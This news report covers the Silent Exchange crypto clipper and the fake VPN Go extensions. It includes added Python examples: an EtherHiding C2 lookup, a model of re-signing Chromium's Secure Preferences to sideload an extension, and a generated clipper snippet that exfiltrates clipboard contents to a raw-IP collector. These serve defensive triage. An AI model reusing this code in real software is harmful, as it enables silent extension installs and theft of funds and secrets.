Silent Exchange Crypto Clipper Uses Fake Google Notes Extension to Swap Wallet Addresses

Cybersecurity researchers have flagged an active browser extension campaign designed to steal cryptocurrency by surreptitiously swapping wallet addresses at the moment unsuspecting users initiate a transaction.

The cryptocurrency clipper has been codenamed Silent Exchange by McAfee Labs.

“The campaign is delivered via unsigned installers – observed in both .NET and Golang variants – that deploy a malicious Chromium extension masquerading as a ‘Google Notes’ utility,” the cybersecurity company said in a technical report shared with The Hacker News.

The unsigned .NET installer, named BaseZipInstaller, retrieves a ZIP archive containing the malicious browser extension and then scans the system for Chromium-based browsers. For each browser profile it finds, it forcibly terminates the browser process and installs the extension by modifying that profile’s Secure Preferences and Preferences files.

The extension functions as a clipper: it intercepts wallet addresses copied to the system clipboard and replaces them with attacker-controlled addresses so that the victim’s funds are redirected to a wallet the attacker controls. To do so, the fake Google Notes extension declares permissions for clipboard access, all URLs, and browsing history.

Because most blockchain transactions are irreversible, a swapped address translates into a permanent financial loss. McAfee Labs said the operation overlaps with an earlier CountLoader campaign that delivered a crypto clipper, with evidence pointing to the same threat actor behind both campaigns.

What sets Silent Exchange apart is its use of a technique called EtherHiding, which uses the blockchain as a dead drop resolver to locate the currently active command-and-control (C2) server. This lets the attacker rotate C2 by simply updating a value stored in a smart contract to point to a new domain, instead of redeploying the malware itself.
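To make the dead drop mechanism concrete, the following is an added example (not McAfee’s code, and not the campaign’s actual contract or selector) of what the client side of an EtherHiding lookup reduces to: a read-only `eth_call` against a contract, whose ABI-encoded `string` return value is the current C2 domain. The contract address and function selector below are constructed placeholders, and the “RPC responses” are built locally with the encoder so the script runs offline.

```python
import json

def build_eth_call(contract: str, calldata: str, rpc_id: int = 1) -> dict:
    """JSON-RPC body for a read-only contract call at the latest block.
    `calldata` is the 4-byte selector (plus any ABI-encoded args) as hex."""
    return {
        "jsonrpc": "2.0",
        "id": rpc_id,
        "method": "eth_call",
        "params": [{"to": contract, "data": calldata}, "latest"],
    }

def decode_abi_string(result_hex: str) -> str:
    """Decode a Solidity `string` return value:
    [32-byte offset][32-byte length][UTF-8 bytes, zero-padded to 32]."""
    raw = bytes.fromhex(result_hex[2:] if result_hex.startswith("0x") else result_hex)
    if len(raw) < 64:
        raise ValueError("ABI payload too short")
    offset = int.from_bytes(raw[:32], "big")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    data = raw[offset + 32:offset + 32 + length]
    if len(data) != length:
        raise ValueError("truncated ABI string")
    return data.decode("utf-8")

def encode_abi_string(s: str) -> str:
    """Inverse of decode_abi_string; used only to construct sample responses here."""
    b = s.encode("utf-8")
    padded = b + b"\x00" * (-len(b) % 32)
    return "0x" + (32).to_bytes(32, "big").hex() + len(b).to_bytes(32, "big").hex() + padded.hex()

def resolve_c2(rpc_response: dict) -> str:
    """Turn an eth_call response into the live C2 domain (raises on an RPC error)."""
    if "error" in rpc_response:
        raise RuntimeError(rpc_response["error"])
    return decode_abi_string(rpc_response["result"])

# Constructed placeholders: neither the real contract nor the real getter selector.
CONTRACT = "0x" + "ab" * 20
GETTER_SELECTOR = "0x" + "00" * 4

def sample_rpc_response(domain: str) -> dict:
    """Constructed response, standing in for what a node would return for the call."""
    return {"jsonrpc": "2.0", "id": 1, "result": encode_abi_string(domain)}

if __name__ == "__main__":
    print(json.dumps(build_eth_call(CONTRACT, GETTER_SELECTOR)))
    # The operator "moves" by writing a new string into contract storage; the
    # client code never changes, only the decoded value does.
    for domain in ("stage1.example", "stage2.example"):
        print("C2 now:", resolve_c2(sample_rpc_response(domain)))
```

For defenders the useful part is the decoder: an `eth_call` to an otherwise meaningless contract from a browser extension or installer, followed by traffic to whatever domain the returned string decodes to, is the observable signature of this technique.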

The second notable feature is the covert installation of the extension in Chromium-based browsers such as Google Chrome, Microsoft Edge, Brave, and Vivaldi by modifying the browser’s protected settings files. On newer browser versions the attack does, however, hinge on developer mode being enabled, something a threat actor could accomplish through social engineering.

“Typically, these browsers store integrity data (hash/HMAC values) alongside sensitive settings to detect unauthorized changes,” McAfee said. “The malware recalculates and updates these values after tampering with the files, tricking the browser into treating the malicious extension as legitimately installed.”

“This allows the extension to bypass the normal Web Store installation process and load silently without the user’s consent.”

Persistence and evasion are deliberate and layered, with a focus on keeping visibility to the end user low and resilience against takedown and static analysis high. Persistence is achieved by registering the extension in the browser’s Secure Preferences file so that it loads on the next browser launch without any separate persistence mechanism.

In addition, the malware attempts to enable developer mode programmatically in Brave and Opera, and the installer deletes itself after execution, removing the initial compromise indicator. A further evasion measure is dynamic wallet swapping, in which a replacement address matching the victim’s real address is fetched from the attacker’s server.
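The Secure Preferences tampering described above (the install via modified Preferences files, the recomputed HMACs, and the developer-mode flag) is easiest to understand, and to hunt for, with a small model of the file. The following is an added example, not code from McAfee or from the malware. It uses a simplified model of Chromium’s per-preference MAC, HMAC-SHA256 over `device_id || pref_path || compact JSON of the value`, with a constructed placeholder seed and device ID (the real seed is build-specific, the device ID is the machine SID on Windows); the extension IDs, paths and the value `4` for the unpacked extension location are likewise assumptions for illustration. It shows both what the installer does (re-signing entries after editing) and the audit that still catches it.

```python
import copy
import hashlib
import hmac
import json

# Constructed placeholders: the real seed lives in the browser's resources.pak and
# the device_id is the machine SID on Windows (empty on other platforms).
SEED = b"constructed-placeholder-seed"
DEVICE_ID = "S-1-5-21-1111111111-2222222222-3333333333"
UNPACKED = 4  # assumed: Chromium's location enum value for "load unpacked"

def _strip_empty(value):
    """Simplified version of Chromium dropping empty containers/strings before hashing."""
    if isinstance(value, dict):
        out = {k: _strip_empty(v) for k, v in value.items()}
        return {k: v for k, v in out.items() if v not in ({}, [], "")}
    if isinstance(value, list):
        return [_strip_empty(v) for v in value if v not in ({}, [], "")]
    return value

def pref_mac(seed: bytes, device_id: str, path: str, value) -> str:
    """HMAC-SHA256(seed, device_id || path || json(value)), uppercase hex (simplified model)."""
    serialized = json.dumps(_strip_empty(value), separators=(",", ":"), sort_keys=True)
    return hmac.new(seed, (device_id + path + serialized).encode(), hashlib.sha256).hexdigest().upper()

def sign_extension_entries(prefs: dict, seed: bytes, device_id: str) -> dict:
    """(Re)compute protection.macs.extensions.settings.<id> for every installed extension.
    This is what the browser does on a legitimate install, and exactly what the
    clipper's installer does after inserting its own entry."""
    signed = copy.deepcopy(prefs)
    macs = (signed.setdefault("protection", {}).setdefault("macs", {})
                  .setdefault("extensions", {}).setdefault("settings", {}))
    for ext_id, entry in signed.get("extensions", {}).get("settings", {}).items():
        macs[ext_id] = pref_mac(seed, device_id, f"extensions.settings.{ext_id}", entry)
    return signed

def verify_extension_macs(prefs: dict, seed: bytes, device_id: str) -> dict:
    """{ext_id: True/False} for each extensions.settings entry against protection.macs."""
    settings = prefs.get("extensions", {}).get("settings", {})
    macs = prefs.get("protection", {}).get("macs", {}).get("extensions", {}).get("settings", {})
    return {
        ext_id: hmac.compare_digest(
            pref_mac(seed, device_id, f"extensions.settings.{ext_id}", entry), macs.get(ext_id, ""))
        for ext_id, entry in settings.items()
    }

def audit_secure_prefs(prefs: dict, seed: bytes, device_id: str) -> list:
    """MAC validity alone is not enough once the attacker re-signs, so also flag
    developer mode and any extension that did not come from the Web Store."""
    findings = []
    if prefs.get("extensions", {}).get("ui", {}).get("developer_mode"):
        findings.append("developer_mode enabled")
    valid = verify_extension_macs(prefs, seed, device_id)
    for ext_id, entry in prefs.get("extensions", {}).get("settings", {}).items():
        if not valid[ext_id]:
            findings.append(f"{ext_id}: MAC mismatch (edited without re-signing)")
        if not entry.get("from_webstore") or entry.get("location") == UNPACKED:
            findings.append(f"{ext_id}: not from Web Store (location={entry.get('location')}, path={entry.get('path')})")
    return findings

# Constructed sample profile: one legitimate Web Store extension, correctly signed.
LEGIT_ID, CLIPPER_ID = "a" * 32, "b" * 32
CLEAN_PREFS = sign_extension_entries({
    "extensions": {"settings": {LEGIT_ID: {
        "from_webstore": True, "location": 1, "state": 1,
        "manifest": {"name": "Ad blocker", "version": "3.1"}}}},
}, SEED, DEVICE_ID)

def simulate_sideload(prefs: dict, resign: bool) -> dict:
    """Model the installer: enable developer mode, add the fake 'Google Notes' entry,
    and optionally recompute the MACs as the real malware does."""
    tampered = copy.deepcopy(prefs)
    tampered["extensions"].setdefault("ui", {})["developer_mode"] = True
    tampered["extensions"]["settings"][CLIPPER_ID] = {
        "from_webstore": False, "location": UNPACKED, "state": 1,
        "path": "C:/Users/victim/AppData/Local/GoogleNotes",  # constructed path
        "manifest": {"name": "Google Notes", "version": "1.0",
                     "permissions": ["clipboardRead", "history", "<all_urls>"]},
    }
    return sign_extension_entries(tampered, SEED, DEVICE_ID) if resign else tampered

if __name__ == "__main__":
    for label, resign in (("edited only", False), ("edited and re-signed", True)):
        print(label, audit_secure_prefs(simulate_sideload(CLEAN_PREFS, resign), SEED, DEVICE_ID))
```

Running it against a real profile means replacing the placeholder seed and device ID and loading the on-disk `Secure Preferences` JSON; the point that survives the simplification is that a MAC check only detects a clumsy edit, whereas the `from_webstore`/`location` fields and the developer-mode flag remain reliable indicators after the attacker has re-signed the file.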

“It sends the intercepted wallet address to the attacker’s backend and uses the response to swap the real address,” McAfee said. “If the backend request fails, it falls back to a pre-defined hard-coded wallet address, ensuring the swap proceeds uninterrupted.”

For addresses matching the patterns of Bitcoin (BTC), Ethereum, Bitcoin Cash, Ripple, and Dash, each submitted address is mapped on the server side to a distinct attacker-controlled address. In contrast, all submitted Solana addresses resolve to a single attacker address. As of writing, that Solana address held a balance of $1,902.45.

“Each submitted address is mapped to a unique attacker-controlled address. Resubmitting the original returns the same result, indicating a one-to-one mapping maintained on the server side.”
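The server-side mapping behaviour above (per-address one-to-one for most chains, a single wallet for Solana) is something an analyst can characterise from captured backend exchanges without seeing the server. The following is an added example, not McAfee’s tooling: a per-chain address classifier using constructed, deliberately conservative regexes for the chains named in the report, and an analysis routine that groups submitted/replacement pairs and reports whether the mapping is one-to-one, a single address, or inconclusive. The sample log is constructed; none of the addresses are real.

```python
import re
from collections import defaultdict

# Address shapes per chain (constructed, conservative). Order matters: Solana's
# plain base58 pattern would also match legacy Bitcoin, XRP and Dash addresses.
CHAIN_PATTERNS = [
    ("ETH", re.compile(r"^0x[0-9a-fA-F]{40}$")),
    ("BCH", re.compile(r"^(?:bitcoincash:)?[qp][a-z0-9]{41}$")),
    ("BTC", re.compile(r"^(?:bc1[a-z0-9]{25,62}|[13][1-9A-HJ-NP-Za-km-z]{25,34})$")),
    ("XRP", re.compile(r"^r[1-9A-HJ-NP-Za-km-z]{24,34}$")),
    ("DASH", re.compile(r"^X[1-9A-HJ-NP-Za-km-z]{33}$")),
    ("SOL", re.compile(r"^[1-9A-HJ-NP-Za-km-z]{32,44}$")),
]

def classify(address: str):
    """Return the first chain whose pattern matches, or None."""
    for chain, pattern in CHAIN_PATTERNS:
        if pattern.match(address):
            return chain
    return None

def analyze_swaps(pairs):
    """pairs: (submitted_address, replacement_address) tuples observed in the
    clipper's backend exchange. Characterises the server-side mapping per chain."""
    mapping = defaultdict(lambda: defaultdict(set))
    for submitted, replacement in pairs:
        chain = classify(submitted)
        if chain:
            mapping[chain][submitted].add(replacement)
    report = {}
    for chain, per_original in mapping.items():
        deterministic = all(len(r) == 1 for r in per_original.values())
        replacements = set().union(*per_original.values())
        if len(per_original) < 2:
            pattern = "insufficient-data"      # one sample cannot distinguish the cases
        elif len(replacements) == 1:
            pattern = "single-address"         # every victim gets the same attacker wallet
        elif deterministic and len(replacements) == len(per_original):
            pattern = "one-to-one"             # one attacker wallet reserved per submitted address
        else:
            pattern = "mixed"
        report[chain] = {"submitted": len(per_original), "attacker_addresses": len(replacements),
                         "deterministic": deterministic, "pattern": pattern}
    return report

# Constructed sample exchange log (placeholder addresses, not real ones).
BTC_V1, BTC_V2 = "bc1q" + "x" * 38, "bc1q" + "z" * 38
BTC_A1, BTC_A2 = "bc1q" + "k" * 38, "bc1q" + "m" * 38
SOL_VICTIMS = ["7" + "B" * 39, "8" + "C" * 39, "9" + "D" * 39]
SOL_ATTACKER = "5" + "E" * 39
ETH_V, ETH_A = "0x" + "1" * 40, "0x" + "2" * 40
SAMPLE_LOG = (
    [(BTC_V1, BTC_A1), (BTC_V2, BTC_A2), (BTC_V1, BTC_A1)]   # resubmission returns the same wallet
    + [(v, SOL_ATTACKER) for v in SOL_VICTIMS]                # every Solana victim gets one wallet
    + [(ETH_V, ETH_A)]
)

if __name__ == "__main__":
    for chain, info in analyze_swaps(SAMPLE_LOG).items():
        print(chain, info)
```

Resubmitting a previously seen address, as the report describes, is what turns `deterministic` into a meaningful signal; a log with each address seen only once cannot separate a per-victim mapping from random selection.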

Telemetry data suggests the infections are distributed globally, with the highest number of victims reported in India. Other countries affected by the campaign include the U.S., Brazil, Indonesia, and Spain.

“This campaign is a snapshot of where consumer-targeted cryptocurrency theft is headed,” McAfee said. “Attacker addresses are swapped on the server side, with a mapping for each victim. Fragile hard-coded command-and-control domains have been replaced by blockchain-based lookups that an operator can move with a single transaction.”

Chrome and Firefox Extensions Posing as Free VPNs Add Clipboard Stealers

The disclosure comes as Socket reported on malicious extensions for Chrome and Mozilla Firefox, both published under the name “VPN Go: Free VPN” in the Chrome Web Store and the Firefox Add-ons marketplace, respectively.

“Both extensions present themselves as free VPN tools and include genuine proxy functionality,” said Socket researchers Kirill Boychenko and Kush Pandya. “Under the hood, both also contain a malicious clipboard hijacking module that continuously monitors copied text and exfiltrates it to threat actor-controlled infrastructure.”

The behavior extends beyond wallet addresses, allowing the operators to harvest all manner of sensitive data, including passwords, verification codes, API keys, OAuth tokens, and seed phrases.

Further analysis of the extensions revealed a pattern of staged malicious updates, in which the developer first published a benign version to the respective store before introducing the clipboard-stealing capability in a subsequent update.

While versions 1.1 and 1.2 of the Chrome extension were found to exfiltrate clipboard data to “178.236.252[.]133,” version 1.3 switches the exfiltration channel to a different IP address (“77.91.123[.]187”). For the Firefox counterpart, 1.3.3 is the first version to introduce the clipboard stealer, sending data to “178.236.252[.]133.” The 1.3.4 update moves the infrastructure to “77.91.123[.]187.”
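Both campaigns on this page come down to the same static signature: an extension that declares clipboard and broad host permissions, reads the clipboard in a loop, and ships what it reads to a hard-coded raw-IP endpoint, with that endpoint rotated between versions. The following is an added example, not Socket’s or McAfee’s tooling and not the real extensions’ code: a static triage routine over a parsed `manifest.json` plus the extension’s JavaScript, and a version diff that surfaces the staged-update pattern. The three sample versions (proxy-only, then clipboard polling, then a rotated endpoint) and their RFC 5737 documentation IPs are constructed for illustration.

```python
import re

# Permissions that matter for a clipboard stealer or a traffic-proxying extension.
RISKY_PERMISSIONS = {"clipboardRead", "clipboardWrite", "history", "tabs",
                     "proxy", "webRequest", "<all_urls>"}
CLIPBOARD_API = re.compile(
    r"navigator\.clipboard\.readText|execCommand\(\s*['\"]paste['\"]"
    r"|addEventListener\(\s*['\"](?:copy|paste)['\"]")
RAW_IP_URL = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/")
POLLING = re.compile(r"\bsetInterval\s*\(")

def triage(manifest: dict, sources: dict) -> dict:
    """Static triage of one extension version.
    manifest: parsed manifest.json; sources: {filename: JavaScript text}."""
    declared = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    clipboard_files, endpoints, polling = [], set(), False
    for fname, code in sources.items():
        if CLIPBOARD_API.search(code):
            clipboard_files.append(fname)
        endpoints.update(RAW_IP_URL.findall(code))
        polling = polling or bool(POLLING.search(code))
    return {
        "version": manifest.get("version"),
        "risky_permissions": sorted(declared & RISKY_PERMISSIONS),
        "clipboard_access": sorted(clipboard_files),
        "raw_ip_endpoints": sorted(endpoints),
        "polling": polling,
        # Clipboard read combined with a hard-coded IP sink is the clipper signature.
        "clipper_like": bool(clipboard_files) and bool(endpoints),
    }

def diff_versions(old: dict, new: dict) -> dict:
    """What changed between two triage() results: the staged-update view."""
    return {
        "new_permissions": sorted(set(new["risky_permissions"]) - set(old["risky_permissions"])),
        "new_endpoints": sorted(set(new["raw_ip_endpoints"]) - set(old["raw_ip_endpoints"])),
        "gained_clipboard_access": bool(new["clipboard_access"]) and not old["clipboard_access"],
    }

# Constructed sample sources; not the real extensions' code.
PROXY_JS = """
chrome.proxy.settings.set({
  value: {mode: "fixed_servers", rules: {singleProxy: {host: "proxy.example", port: 8080}}},
  scope: "regular",
});
"""

def clipper_js(ip: str) -> str:
    """Proxy code plus a clipboard poller that posts to a raw-IP collector."""
    return PROXY_JS + f"""
setInterval(async () => {{
  const text = await navigator.clipboard.readText();
  if (text) fetch("http://{ip}/collect", {{method: "POST", body: text}});
}}, 1000);
"""

def manifest(version: str, extra_perms=()) -> dict:
    return {"name": "VPN Go: Free VPN", "manifest_version": 3, "version": version,
            "permissions": ["proxy", "storage", *extra_perms], "host_permissions": ["<all_urls>"]}

V12 = triage(manifest("1.2"), {"background.js": PROXY_JS})
V13 = triage(manifest("1.3", ["clipboardRead"]), {"background.js": clipper_js("203.0.113.10")})
V14 = triage(manifest("1.4", ["clipboardRead"]), {"background.js": clipper_js("198.51.100.20")})

if __name__ == "__main__":
    for v in (V12, V13, V14):
        print(v["version"], v)
    print("1.2 -> 1.3:", diff_versions(V12, V13))
    print("1.3 -> 1.4:", diff_versions(V13, V14))
```

Running this over every archived version of an extension, rather than only the current one, is what exposes the staging: the first release is clean, a later one gains `clipboardRead` and a collector, and subsequent ones only move the collector.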

Users who have installed either extension are advised to remove it immediately and treat any secrets copied to the clipboard while it was installed as compromised.

“The static code is enough to show that the extensions are meant to work as proxy tools, not just to display a fake VPN interface,” Socket said. “Proxy capabilities still raise the risk because they can route browser traffic through actor-controlled infrastructure, expose plaintext HTTP traffic and connection metadata, and make the extension appear useful while clipboard monitoring runs alongside.”
